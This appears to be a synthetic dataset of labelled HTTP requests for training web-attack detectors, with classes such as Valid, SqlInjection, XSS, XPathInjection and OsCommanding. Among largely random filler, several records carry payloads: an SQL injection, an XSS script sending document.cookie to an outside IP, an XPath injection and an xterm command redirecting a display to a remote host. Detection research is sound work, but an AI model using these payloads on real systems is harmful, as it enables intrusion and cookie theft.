Warning: 855 www.ece5Rtd.shtml "aStprsanaUieimSniow" 
X-Forwarded-For: 74.209.53.98
X-Serial-Number: 61054598804485092045
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40527
Start - Id: 41501
class: SqlInjection
POST /sdo2eqrTkld5bsohw/Rihdnn4vrnseeu/6kAupdateP-/ssoeetZp13IP/1ar.6lo9Bt4F4icmht/bp/rbWN37LPeQyT/DOihuMCMtmp/icphsj.exe? HTTP/1.0
Content-Length: 76
Content-Language: ioef8nn,a7oseg
Content-Encoding: identity
Content-Location: /iBhAaarm/oqlA.wmn
Content-MD5: ZXQzYWVlUWRvemF6bmFyZA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 29 Jul 09 07:26:25 UTC
Last-Modified: Wed, 10 Mar 10 05:41:36 CET
Host: www.teeousibto.net
Connection: wr4ztsl
Accept: audio/*
Accept-Charset: *;q=0.5
Accept-Encoding: identity, deflate
Accept-Language: *;q=0.0
Cache-Control: 75=taua4hhy
Client-ip: 221.158.6.21
Cookie: vnediOeAtocwwes=860649;ccinsertz1B9bodyxSx=)2w 7ieNb ~
Cookie2: $Version="13"
Date: Tue, 23 Jan 07 04:08:20 GMT
ETag: W/"6wYRe7NHXfdKLFK"
Expect: maEbbf
From: 8raL@hudstis9.fr
If-Modified-Since: Fri, 01 Sep 06 24:59:04 GMT
If-Unmodified-Since: Mon, 02 Feb 04 11:56:52 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 0605
MIME-Version: 5.5
Pragma: xjtueY='Noa3a2d'
Proxy-Authorization: NTLM ZWx3bnJjY25jVGVvbzkzZHRuMWFhbGFydzVhcmVuaHl6YnF2Yw==
Authorization: Basic eHJlZWVJOnNuc2Ry
Range: 229-94,-0,-455
Referer: http://www.Ttoiogx.fr/meScta/qmhre/35etfotd/re0ash/hsdirc.tar.gz
TE: deflate;q=0.9,trailers,gzip
Trailer: Upgrade
User-Agent: Mozilla/6.1 (compatible; 1uwet1wmm; Win98; derap1Uc)
UA-CPU: MIPS
UA-Disp: 8226,551,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 5893x919
Via: 0.8 www.uuteUZl.shtml, e3epcc/9.0 9.187.170.229
Transfer-Encoding: gzip
Upgrade: tgh/9.5, bumnsf/4.1, dt1/2.5, imuous/2.6
Warning: 111 www.Ieeee3e.gif "edowgieoaEca" 
X-Forwarded-For: 202.241.229.181
X-Serial-Number: 6237226305508453843
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

sict=6UCc0rpSJv&edGa=or 0<>(select    count(*)   from  yjstxt9m)

End - Id: 41501
Start - Id: 9754
class: Valid
GET /dtseRntae4pndoo/services_m.dll? HTTP/1.0
Host: www.tWnamdkm.be
Connection: yeee4iL
Accept: image/gif;q=0.4, audio/*
Accept-Charset: windows-1258;q=0.0, x-mac-icelandic;q=0.6
Accept-Encoding: 
Accept-Language: dlih-bdct5rD;q=0.4, esaiee7n-eey;q=0.7, fMnn-otrf, si0rr-qOr, p5a-mrewey
Cache-Control: no-store
Client-ip: 63.10.196.4
Cookie: rUcathLl=570720;ttwXleare=adminq3 Rmt;nfoaeoyexowqie=LfNt0>szd enYe do;1Tortiddc8otRW=t6WqPgPnW;dne7=oioqsuyrADAeE;dwutn=a5
Cookie2: $Version="350"
Date: Fri, 28 May 04 11:20:39 GMT
ETag: "4fivot.J_rjq4aU"
Expect: 100-continue
From: eLae2iyg@i6ilvqwa.ch
If-Modified-Since: Sat, 02 Feb 08 06:42:50 UTC
If-Unmodified-Since: Thu, 01 Sep 05 21:47:24 CET
If-Match: "BDFwfTzvehUb0Z.w.MPB"
If-None-Match: *
If-Range: "K3UBbPT8isCx_ub"
Max-Forwards: 6414
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: tonFs fnhRm=aeofnoj
Authorization: zeeA ffuqrijn=eo5rchOa
Range: -585780,60750-302396,970996-
Referer: http://iEn1ntnh.it/tEso.doc
TE: trailers,trailers,gzip
Trailer: Referer
User-Agent: Mozilla/8.3 (Windows; U; Win98 3.2; ee-fo; rv:4.8.3) Gecko/11851981
UA-CPU: StrongARM
UA-Disp: 5705,3975,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 6817x021
Via: HTTP/8.1 195.143.175.30, HTTP/4.8 www.gmreZr.jpg, 4.1 www.Gtdnn6x.shtml
Transfer-Encoding: compress
Upgrade: ac6/4.7
Warning: 953 180.113.100.133 "os75rearnh" "Sun, 27 Apr 08 19:25:31 CET"
X-Forwarded-For: 199.75.6.60
X-Serial-Number: 937322
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9754
Start - Id: 2816
class: Valid
GET /B.6MMN7LT_QBnO8/wdiveUl.piframeBbin/q@8ShbgsoundoE/ua9oeq6i8a/8CWRUygWinputMB4eF/epTcntnesihiecrh/uxbhlwE2inenlAeeetl/of__2LOod/tnksoitfsj5p/dcm/0i1.libk.PjUmhAVe/gdt.html? HTTP/1.0
Host: www.0hsohsas.uk:80
Connection: xense6i3
Accept: text/html;q=0.3, video/*;q=0.1
Accept-Charset: *;q=0.4
Accept-Encoding: *
Accept-Language: tohott-n, r-pteeU, s-ntsrano;q=0.3
Cache-Control: no-store
Client-ip: 191.230.105.98
Cookie: eearia=h/varoE jn48t;njapopwdss=921;irlb42Sc=i38s2e0odorh;gXlpassthru32DH8Rd=0310543;ewpasIninodLSl=n1Sxt;5tatltRe5tkmp=205511
Cookie2: $Version="0"
Date: Sun, 20 May 07 13:12:40 UTC
ETag: "m7IJo_S-76ZKUca4Re"
Expect: egaCAcef=u2oDel;iueosam
From: iReicda@4nt3rlflA.st
If-Modified-Since: Thu, 11 May 06 04:36:39 CET
If-Unmodified-Since: Tue, 02 Feb 10 12:41:18 GMT
If-Match: "Rt1hC0YCkPomGiu8S"
If-None-Match: "meel2nVzxIq0CNqP"
If-Range: *
Max-Forwards: 82
MIME-Version: 8.2
Pragma: at=uei
Proxy-Authorization: Basic b3J4dDp0NWozaFBz
Authorization: Basic cTJ2dzpVaTZJNG4=
Range: 61521-,808073-,9-0
Referer: /etsE0ol/llubnzu/hehmdM.mdb
TE: trailers,trailers,trailers
Trailer: Warning
User-Agent: Mozilla/7.5 (Windows; U; Win98 1.9; oh-mG; rv:3.7.1) Gecko/58137548
UA-CPU: Sparc
UA-Disp: 462,5180,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 620x373
Via: HTTP/6.3 www.mcialab.js:1, HTTP/3.4 169.58.44.175, 9.2 www.rcl3thb.htm
Transfer-Encoding: lihd
Upgrade: Sbhjos/1.1
Warning: 710 163.232.225.18 "glcasie34ee" 
X-Forwarded-For: 213.3.252.110
X-Serial-Number: 82627
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2816
Start - Id: 48192
class: XSS
PUT /8hqeih8hn7ndaoEcLo/luoJ.html? HTTP/1.0
Content-Length: 49
Content-Language: eiRtoeos,rodec,alanbd01
Content-Encoding: compress
Content-Location: http://nnssaee.uk/tw2swt/dlan/rasenu/ntto2ta/hoqko.pdf
Content-MD5: ZWVvaDFlNHJ6ZWlybmk4ZA==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 15 Oct 05 15:40:11 CET
Last-Modified: Mon, 15 Oct 07 01:17:18 CET
Host: www.rtptwoabdb.be
Connection: close
Accept: */*;q=0.7
Accept-Charset: *
Accept-Encoding: <!-- -- --><script   >[window.open('http://74.10.61.50/ntie.exe'+document.cookie);]</script ><!-- -- -->
Accept-Language: c-ttYeo, t-nockn;q=0.8, r-tau;q=0.9, toeicnQ-heR;q=0.3
Cache-Control: min-fresh=903
Client-ip: 4.175.115.52
Cookie: soO=wesAsmDa ;eeDoehire=33045
Cookie2: $Version="76"
Date: Tue, 02 Mar 10 20:41:54 UTC
ETag: W/"fHpeY1yAnsnzfzE3rW"
Expect: alo9v=ts9oerrr;si8nlg=taofacfO
From: MrMq@qyrhdoc.st
If-Modified-Since: Sat, 10 Feb 07 17:14:02 CET
If-Unmodified-Since: Fri, 27 Feb 04 24:14:58 GMT
If-Match: "z8mHRgCQXuZfa80Obkm"
If-None-Match: *
If-Range: *
Max-Forwards: 0155
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: Digest cnonce="sTcbsOs"
Authorization: Basic c2JsbmFIczplbnJh
Range: 4-7,-93,820296-262758
Referer: /cmep/ryso/ocoegmTe.swf
TE: trailers,chunked
Trailer: Range
User-Agent: Mozilla/0.1 (Windows; U; Windows NT 8.5; da-yv; rv:9.2.2) Gecko/82875834
UA-CPU: Sparc
UA-Disp: 198,6398,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 239x769
Via: 0.5 www.p9rtmsd.png:958, 2.8 www.cFenlr9o.png, HTTP/3.9 46.157.64.155
Transfer-Encoding: compress
Upgrade: aoeb/1.7, cdhrc/3.3
Warning: 485 48.192.206.24 "Beiucn" 
X-Forwarded-For: 14.254.128.231
X-Serial-Number: 1417997489185610927
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

rneejGs= tlr%&Eidsaatuqakedo=315767987&ftem=3me

End - Id: 48192
Start - Id: 35165
class: SqlInjection
GET /gtAm/childIaccess_logoShomecppR-/fyX0ztfIBz.13onqFVEv/tU4.gN6e3u.sU.mdb?wdWxAvaul=iNmior&ei=e%28d3e+Ed%40toieg&EYe=4&enenelyTn=112705+or++id%3E2+or++ls_id%3C0977555&09XhueWYRZ=8256800&pionsasUrlmrsa=871444&qanlhYonoesin=8f62tfaisialen&se=%3Fy4%2Bcgroup+bym%2BoE&saDkrhdanhieu=hm3pvt3889i&nopagqo=iabn&mstdite8it=tuacJa26am3r HTTP/1.0
Host: www.gvliheah.org
Connection: eebga2
Accept: */*
Accept-Charset: iso-8859-8
Accept-Encoding: *;q=0.1
Cache-Control: max-stale
Cookie2: $Version="98"
Date: Sat, 03 Nov 07 18:29:14 UTC
ETag: "kbNy1FPfU8@91Dh"
If-Modified-Since: Fri, 27 Feb 09 02:47:33 UTC
Proxy-Authorization: Digest realm
Range: 68528-9,12066-,36249-
Referer: /uhoc9ze.php3
User-Agent: iahsRyreehc9cb2
Transfer-Encoding: deflate

null

End - Id: 35165
Start - Id: 548
class: Valid
GET /E3sTi0rnz/syia/rN5.nsf?rttor=xh%3C3&ensrhU5sh8=usxns8d1&cNzeDxe=c-z9zvnB3&7ltlE=t8%7Cnal&stnl3rc=ebgl&z3soqD=51239 HTTP/1.1
Host: www.8aom8.org
Connection: ntew
Accept: audio/*;q=0.8
Accept-Charset: us-ascii, hz-gb-2312;q=0.3
Accept-Encoding: *
Accept-Language: ilbwh-5oa;q=0.9, n2Eotw-c4
Cache-Control: no-transform
Client-ip: 251.178.170.205
Cookie: 8e-.betweenD=i.tJEAd
Cookie2: $Version="4"
Date: Thu, 08 Mar 07 21:54:19 GMT
ETag: W/"z_PlEuMD@OYhaZFNhw"
Expect: 8mlnolre=hrua
From: aw3y@tagxoisrl.de
If-Modified-Since: Sun, 18 Oct 09 15:03:38 CET
If-Unmodified-Since: Mon, 27 Apr 09 10:21:50 GMT
If-Match: *
If-None-Match: "DTURDvl1Wo6.1TGpF"
If-Range: "N8slPnWA8vuSg8Q8Fa"
Max-Forwards: 4623
MIME-Version: 6.5
Pragma: s2jdr=c4erk0oe
Proxy-Authorization: Basic N2dtVGFzOjh4cnRw
Authorization: moQfnt kieuxhid=unbtiB9
Range: 9455-3
Referer: /tnu0/C8hdl4o3.avi
TE: deflate;q=0.4
Trailer: Accept-Charset
User-Agent: Mozilla/0.0 (Windows; U; Win98 1.4; G2-es; rv:7.5.1) Gecko/61049654
UA-CPU: StrongARM
UA-Disp: 7032,830,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 840x5182
Via: 4.8 www.tecnos.gif, HTTP/9.7 www.r6ota.jpg:4435, FTP/5.0 www.eezI98.css
Transfer-Encoding: Ttgdt; 4gs0Ootv=eozdiEi
Upgrade: tth/7.2, dia/5.2, 17ohEa/5.1, dn2/4.0, lsaabo/1.1
Warning: 256 www.fsdPc.htm "rHeIzlrwN64st" "Sun, 11 Jul 04 05:24:39 CET"
X-Forwarded-For: 248.12.237.242
X-Serial-Number: 87479375442
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 548
Start - Id: 18275
class: Valid
GET /9nIlWQU/wgBFZb54-/nO65T0/ZandzncVshutdownv094esu/untuu/exerc6ytsiehnpdst/p0P1cecsremboelydR/gEt./Ieg1nbrtdeT/sortnosomYaq0cAmr1se/sSho.jsp? HTTP/1.1
Host: www.st4ieoery.st:9325
Connection: close
Accept: */*;q=0.1
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: drno3-wnN;q=0.0, juat0Hh-afLon;q=0.0, bgw-g9rypdnt;q=0.7, sgn5s-isrteo
Cache-Control: max-stale
Client-ip: 18.236.136.84
Cookie: tayUdno5=fZdEiWWKYEy;Blocationbcat@execZxxmlcJJ=59;9tp=-fddivtOgim;b6dgdfermiy2nr=tnb0ea rdtr oa;jfThomehy0v.=54837;nt=9303
Cookie2: $Version="885"
Date: Sun, 04 Apr 10 13:08:50 CET
ETag: W/"gA5TPxjX67hHpLoXl@v"
Expect: 8ornd
From: tAienyay@xtgc.gov
If-Modified-Since: Wed, 25 Oct 06 20:32:11 GMT
If-Unmodified-Since: Tue, 19 Apr 05 12:38:15 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 3
MIME-Version: 5.7
Pragma: stw='nniptreq'
Proxy-Authorization: tOws weren2rT=4eqgot
Authorization: NTLM emZvaWVvYnNobXRwYWxpaEtpZWNodGNpb3N4QTkxdGh3YWU0bGxl
Range: -11,38-117987
Referer: /sesIHas.wmn
TE: trailers,chunked;q=0.8,gzip
Trailer: Authorization
User-Agent: n2xU0M http://www.vmGelivt.biz
UA-CPU: Sparc
UA-Disp: 9840,221,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 364x686
Via: 6.0 www.rdean.htm, 4.2 240.75.255.62
Transfer-Encoding: identity
Upgrade: dtoa/8.6, tysts/7.5, rrg/6.2, sDwb/3.9
Warning: 762 196.141.83.165 "dsswWgdregtkm" 
X-Forwarded-For: 44.250.109.77
X-Serial-Number: 7475930929134
----: -----------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 18275
Start - Id: 22901
class: Valid
GET /sytTSnil5rxehnT/wuhJgyVx6bo0FHbaTYE/AAwhs/sg9r1anevtlesT3.js?rsatygth=6JCPxkcQ HTTP/1.1
Host: 163.25.81.185:85
Connection: close
Accept: video/mpeg;q=0.8
Accept-Charset: iso-10646-ucs-2;q=0.7
Accept-Encoding: 
Accept-Language: ao-be;q=0.9, nl-h;q=0.9, 5ee-g3us, qbte3EW-sn0;q=0.7
Cache-Control: no-store
Client-ip: 238.41.42.217
Cookie: axi=ee;gNwDfXclibaxp=evR7vyv_
Cookie2: $Version="839"
Date: Sun, 04 Jan 09 05:33:39 UTC
ETag: W/"hyv0edTNCyIQZRvWT"
Expect: 100-continue
From: i3tdns@Gdxetisea.uk
If-Modified-Since: Sun, 05 Sep 04 19:54:18 UTC
If-Unmodified-Since: Sat, 30 Sep 06 19:46:22 GMT
If-Match: "EfY45aO6poCDhibFwj"
If-None-Match: *
If-Range: Mon, 17 Mar 08 04:44:00 GMT
Max-Forwards: 5978
MIME-Version: 7.2
Pragma: hc69ic=ao2h
Proxy-Authorization: Digest response="D5eE089E6EEFdcB7A2271Cf2fC0Fc032"
Authorization: Digest nc=6F49a351
Range: -6039,4724-
Referer: http://www.bwehsfO.net/cbSsos/9tEk.tiff
TE: deflate,gzip
Trailer: Accept-Encoding
User-Agent: kNXL2hv-Y http://www.gfHroige.fr
UA-CPU: 68000
UA-Disp: 3881,209,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 301x6303
Via: FTP/9.6 80.188.251.238
Transfer-Encoding: deflate
Upgrade: oua/3.4, otefro/7.9, jrsm/7.4, wttl2/5.4
Warning: 383 www.enRF.jpeg "I3teed" 
X-Forwarded-For: 49.248.212.8
X-Serial-Number: 426023548
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22901
Start - Id: 22112
class: Valid
GET /hp-ZVP52Db1.P3w/pGL_@s8Bu5x/39ara3ubhemeus9nc/lmflaao/uzsTsNGct_ko3jcU.jpeg?3u8rhEauo8es=645340 HTTP/1.0
Host: www.gaxt6ec.cz
Connection: keep-alive
Accept: application/zip
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 204.187.68.18
Cookie: asuS=20;HeavJ=tlD
Cookie2: $Version="979"
Date: Tue, 23 Mar 10 04:22:20 UTC
ETag: "Eo5FYzDFb7Xyw5IhtlZO"
Expect: 100-continue
From: cemr@yhuhe3Dw.cz
If-Modified-Since: Fri, 21 Dec 07 17:46:06 GMT
If-Unmodified-Since: Sat, 29 Nov 08 24:28:54 UTC
If-Match: *
If-None-Match: "T-r0GBZOhSuXb@FzLR"
If-Range: Fri, 03 Aug 07 02:26:57 CET
Max-Forwards: 3097
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: Digest username="spkw"
Authorization: gtsru ohiiOQ=eo5xye
Range: 1976-
Referer: /8i9sni/con6.pl
TE: trailers,chunked;q=0.0
Trailer: Range
User-Agent: Mozilla/6.9 (X11; U; Solaris 5.8; eu-aa; rv:5.5.6) Gecko/83024270
UA-CPU: x86
UA-Disp: 2956,8446,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 8724x0388
Via: 2.8 155.120.132.219
Transfer-Encoding: e1s1
Upgrade: sdqs/1.2, otap/2.3, suO/8.6, t03/1.8
Warning: 536 162.78.197.155:33480 "iebaetgd" "Tue, 25 Oct 05 10:31:53 GMT"
X-Forwarded-For: 174.83.21.40
X-Serial-Number: 42920569636252963929
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 22112
Start - Id: 50101
class: XPathInjection
PUT /p@syK4zxWIjupN/rStEii26ejpno7/ikd@CyH6W-.cfm? HTTP/1.1
Content-Length: 338
Content-Language: abnn
Content-Encoding: gzip
Content-Location: /nn8r/r7rn/blodet.dll
Content-MD5: cmNtUmFlOG10aWppYWVhdg==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 16 Aug 04 22:09:33 CET
Last-Modified: Sun, 22 Apr 07 07:36:11 UTC
Host: 255.165.254.202
Connection: v7Oif
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: deflate, gzip;q=0.4
Accept-Language: mt-ihCtzoA;q=0.1, mhntfrAa-s6;q=0.6, a0toebt-sao, dseb23-iys;q=0.4, eheEAtet-ah62Lu;q=0.8
Cache-Control: nn1ioieo='rhEl'
Client-ip: 154.185.255.237
Cookie: 64stlqaalrAga=1063793;nenmoeqr=bIA0tfZ' or 1< ta1/d/kr1/child::text()[position()=32]    or     'eTes3e'  =    '
Cookie2: $Version="14"
Date: Sun, 18 Apr 10 21:24:00 UTC
ETag: "PlgwVVj7oo0ezHxa-"
Expect: 100-continue
From: haTsx@Tdios0mS.be
If-Modified-Since: Tue, 11 Dec 07 06:25:36 UTC
If-Unmodified-Since: Thu, 22 Jan 04 06:46:21 GMT
If-Match: *
If-None-Match: *
If-Range: "41L2_F1tIbSKP4Ln"
Max-Forwards: 769
Pragma: no-cache
Proxy-Authorization: Basic NW10c2NSQjpmbGh1Mg==
Authorization: Digest nc=11aFA03d
Range: 39-707535,719-
Referer: /F1b9ncy/1ria/n3omo.bin
TE: deflate;q=0.5
Trailer: Warning
User-Agent: Mozilla/5.0 (compatible; MSIE 6.9; Mac OS X; tesiod; cnoeT; rnsyo8s)
UA-CPU: x86
UA-Disp: 5161,5991,16
UA-Color: color8
UA-Pixels: 465x962
Via: 4.8 108.29.125.243
Transfer-Encoding: gzip
X-Forwarded-For: 64.186.118.225
X-Serial-Number: 8805837384319
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

hcTe=srzi&9Hddsaeta8Gkhwr=4seorIitc3ofso&agiez6ee=eeos pvbscriptt2ediod- \s&Vp3VnOPevalmh=oogJ-6BJE&e7aaslspre=ln&kiamEe8rje=6367&KYB9t5=ere7nh&toi8ufbrn=6303&processing-instructiong@oqJ4=33511586&iitsiyhbe7u=g/<u&rjopsuetgTDc0=sIGmk&hisn2a7aht6ewhw=0863616&eodostniiW5tSl=9351453&ahNEisrw4dbci5e=httpsreplaceeek&dphlap0roSsRe=e6GIZ

End - Id: 50101
Start - Id: 13910
class: Valid
GET /tnyEOosoakietente/EiLlEjWBwgetlP2.meta/8y_NFZhtpasslikeD6objectWgVt/f2ligaaeTusnoew/MDw0Asock_streamRsbin/axTdfAgyi0yJ6zJJ/aAe50/emtntiimOhnlvnSr.htm?l370m=83136826&nipdvooah=likencU-io+lpobgsoundi%24&nl4=x%5D%3Abe&amhtOnntncsiunn=nOte&xeert8m=%5Bsttad+t+linke%3Arnf+o&aekqdi=t0d++&tket=mnEsltcnryaye7nh&ea=2420304 HTTP/1.1
Host: 97.61.105.193
Connection: keep-alive
Accept: text/html;q=0.8, image/gif
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: max-age=8
Client-ip: 179.61.107.5
Cookie: hYerhe6ia=mryy i t;c)n2snTT;siqa8tgotjxmt=oero8EOep;gheeTkoTu3ibhs=331441
Cookie2: $Version="2"
Date: Thu, 30 Nov 06 17:14:06 GMT
ETag: "iq.zQSAbv1vY8gkzE.B"
Expect: 100-continue
From: mshmtny@eieiosii.fr
If-Modified-Since: Tue, 28 Feb 06 03:22:15 GMT
If-Unmodified-Since: Thu, 03 Apr 08 24:09:16 GMT
If-Match: *
If-None-Match: "B01oWeYlrUegFfZF9zl_"
If-Range: *
Max-Forwards: 4
MIME-Version: 5.3
Pragma: b=r
Proxy-Authorization: Digest nc=BBf6FEa4
Authorization: NTLM dHdleXVoc2xyZG1vbnJzdGFvY2FpcUltdGMzaGxwcm1h
Range: 868-9,0-
Referer: /xoynei/riae7nl/sk9oiTi/czpw.php
TE: deflate
Trailer: Transfer-Encoding
User-Agent: Mozilla/4.9 (Machintosh; U; PPC 4.2; et-Lt; rv:9.0.5) Gecko/64132852
UA-CPU: Sparc
UA-Disp: 215,5211,32
UA-OS: Win95
UA-Color: color32
UA-Pixels: 7739x7906
Via: 6.6 46.156.207.66:6, HTTP/7.2 30.202.99.192:40365, HTTP/8.0 www.sLrbIel.png
Transfer-Encoding: compress
Upgrade: fen/1.4, nTejti/5.2, s4r6n/6.9
Warning: 813 152.30.192.175 "oqazlfoqQirrrtqe" "Mon, 31 Oct 05 07:13:42 GMT"
X-Forwarded-For: 150.165.127.46
X-Serial-Number: 102032421943
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13910
Start - Id: 35845
class: XPathInjection
GET /oJ7w8IS/c6xlocationQ9@P_ew0/etajundvtd4e6xaae/GJ1Gnodev6Wllt.shtml?av8A5aiNra=%28i+%3C++++count%28eyi%2Fchild%3A%3Atext%28%29%29+++and+j+++++%3C++count%28aotiOe%2Fchild%3A%3Acomment%28%29%29+and+++k++++%3C+++count%28ooflDu%2Fchild%3A%3A*%29++++%29&a1hmd6u=8472280&elncamesugwm=elrcci+&olbev=dtU532Eaoouu&iaJI=To+Isq5shal&winnt-DE3cCfF=n%40XlcL%40yAvo&SNincludeVY67BBOE=so1ma&moo=6303&iaofy9xbfha=6494362&769mleNsheQ=+s+&etfieET=oeN&re8olgenr54yyhG=ihenoc&m5oz=8rv HTTP/1.1
Host: www.hoyse.be
Connection: close
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: identity;q=0.7, identity, identity;q=0.8, deflate
Accept-Language: dlseip5-lceuSre, eG-iKt;q=0.8, odsrrt-oe;q=0.4, ao-c;q=0.3
Cache-Control: eg='8oa5t'
Client-ip: 177.161.53.181
Cookie: es7eith=nt;LoybmU2=975517;ctfti=eahl|cerq1cna]
Cookie2: $Version="398"
Date: Wed, 17 Mar 04 19:56:40 CET
ETag: "bhOsZQ9I08QZQJM3GB.5"
Expect: sc2nG
From: wcsotyes@fnolepci.st
If-Modified-Since: Tue, 01 Feb 05 14:04:24 CET
If-Unmodified-Since: Thu, 10 Jan 08 07:21:19 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 99
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: do1ee dtreee=is8turnl
Authorization: Basic MmM5bERoOm50eTZtZ2Uw
Range: 77-,-9
Referer: http://tlmc.fr/RThd/enleot/NsbptpaH.css
TE: gzip,gzip
Trailer: Authorization
User-Agent: Mozilla/0.6 (X11; U; Open BSD i586 3.4; mq-qh; rv:3.6.0) Gecko/45318284
UA-CPU: PowerPC
UA-Disp: 747,476,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 4135x5853
Via: 7.5 www.aid3rrs.jpg, unuse/9.8 www.yvnsDhjy.gif, FTP/6.3 175.87.111.111
Transfer-Encoding: identity
Upgrade: ml1/5.5, VeaAtn/8.1, thmg/1.6, lbedtw/3.5
Warning: 327 215.134.162.135 "tumeaatn0ePv5noa" "Fri, 09 Dec 05 05:29:32 UTC"
X-Forwarded-For: 43.11.206.228
X-Serial-Number: 83889853145892267537
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35845
Start - Id: 42966
class: OsCommanding
GET /aBwbeesI/ebJJBXmubOzQMJqd4O/MHC578.html?ns=kma&kz6b3e=yWtgw&netcati.Kh=8316039&eoer=execzewri&aeant0b0R6t=26826&Ner=zwinnttw+&9c=23630529&Ea31anlcej28=8owp-Ait%7Espositiong&3nydee2ju1o=a-dnEzQr9&8einiAcryntpkmr=tdNatescerta1dic&mdanhakcsse=iQYEWsakez&1ereiwRui=25&eg4iZhpttlr=ooqGn&gd=376223&9aonsix=dnb5iaKial2weYclp HTTP/1.1
Host: 83.66.229.67
Connection: pfuo
Accept: */*
Accept-Charset: big5;q=0.7, iso-8859-6;q=0.6
Accept-Encoding: *;q=0.3
Accept-Language: ud-o, y2ttsra-rnn, ob0rmn-dP, k7aruw-oMbdtnej;q=0.4
Cache-Control: 41Tt='To'
Client-ip: 162.231.56.83
Cookie: gaMnVyeimcln=[Z7t tyutunhGhit?a(b;eitdAmwcsNoaptb=|   /usr/openwin/bin/xterm+-display+171.70.8.127:0%00;IqO_o4Jh=aantpietaKe hm
Cookie2: $Version="0"
Date: Wed, 05 Mar 08 18:26:34 GMT
ETag: "BY_3eSTW3yc4dwD-"
Expect: 100-continue
From: aaoq@n8t5el2e.org
If-Modified-Since: Thu, 02 Apr 09 19:54:15 UTC
If-Unmodified-Since: Sat, 03 May 08 23:32:37 CET
If-Match: *
If-None-Match: "wNHvja0wtmDajYnC"
If-Range: Sun, 19 Feb 06 11:15:03 CET
Max-Forwards: 17
MIME-Version: 5.1
Pragma: sa1td='a'
Proxy-Authorization: Basic aWl3dDp5aWNidHQ=
Authorization: NTLM YkN0Y3ViaWZjdHYxYzBEWDZyZHRuaWltb25UZWZvOVBkM3NvZ2xncml0OXdX
Range: 135953-1
Referer: http://www.9TLreh.it/lETenmr/tCstosts/5e4w1lsu/nialgRly/e1hr0da5.js
TE: trailers
User-Agent: Mozilla/4.7 (compatible; MSIE 2.0; SunOS sun4u; yze5aOeMF; Eosqc)
UA-CPU: StrongARM
UA-Disp: 702,4199,8
UA-Color: color32
Via: 3.9 www.hcral.css:723
Transfer-Encoding: gzip
Warning: 517 202.242.64.75 "yesnOrnoyqnhoe5vtzi" "Mon, 26 Dec 05 17:30:01 GMT"
X-Forwarded-For: 145.166.242.21
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42966
Start - Id: 23397
class: Valid
GET /dh1y7Uxy-/C.3catnlog/eue/ehg8nid@Lp/9nph-LyS/h4aooOw78cren4ylnurr/aKwVagHvS-Z-ffeq1/ue2Pxp_4FRLK/isin6se.jpeg?erllbenfig=20276125&ieovbtfesgts=2nsvw9coc9rt&nsa=oDfhtFT&onn=uVjQs&eK1.tmpQmowLK=lhL&lOH2GL=o+tio%3AJ0th1LcRhtaccess&cSy@jMb=Piadtwinntagtdr&suep=eapxse0nt6e7&2aauifnl30xsey=+&crasepnh=aoaeect3Tlsbo&vbalpa=3&wJCa7sA=axuIi&sectoMBnt=homeeps HTTP/1.1
Host: 84.225.110.210:6
Connection: close
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: deflate, gzip;q=0.0, identity, identity, identity
Accept-Language: gXpt-dmb2it, Vr-Thcp;q=0.3, lz-l5esto, 0gm-cuvfil;q=0.4
Cache-Control: sEhoa5d='uDOuue'
Client-ip: 197.160.242.252
Cookie: thdekhhdeekrt=gg6tnjnlarilro;oO=68700;mvCN8@@=llib
Cookie2: $Version="1"
Date: Tue, 22 Jul 08 18:15:05 GMT
ETag: W/"u0hOJaQV.ZRqffTIUx"
Expect: 100-continue
From: kisol@le4e.uk
If-Modified-Since: Sun, 04 Jan 09 05:22:17 UTC
If-Unmodified-Since: Fri, 27 Jul 07 05:26:59 CET
If-Match: *
If-None-Match: "3gf6Yt1TE3hwNGoA"
If-Range: Fri, 02 Oct 09 14:00:36 UTC
